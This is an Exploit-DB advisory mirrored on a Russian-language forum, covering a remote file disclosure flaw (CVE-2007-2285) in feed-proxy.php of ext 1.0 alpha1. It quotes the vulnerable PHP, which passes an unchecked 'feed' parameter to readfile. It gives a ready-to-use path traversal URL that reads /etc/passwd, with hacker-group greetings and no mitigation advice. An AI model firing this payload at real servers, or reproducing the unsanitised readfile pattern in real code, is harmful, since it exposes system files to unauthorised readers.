- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3800
- Проверка EDB
-
- Пройдено
- Автор
- ALKOMANDOZ HACKER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2285
- Дата публикации
- 2007-04-25
Код:
# ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
# D.Script: http://yui-ext.com/deploy/ext-1.0-alpha1.zip
# Discovered by: Alkomandoz Hacker
# Homepage: http://www.asb-may.net - mohandko.com - sniper-sa.com - tryag.com
# V.Code In /examples/layout/feed-proxy.php
----------------------------------------------------------
header('Content-Type: text/xml');
readfile($feed);
return;
}
?>
----------------------------------------------------------
# Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=http../../../../../../etc/passwd
# Greetz To: AsbMay's Group & City Of Ghost Team
# milw0rm.com [2007-04-25]
- Источник
- www.exploit-db.com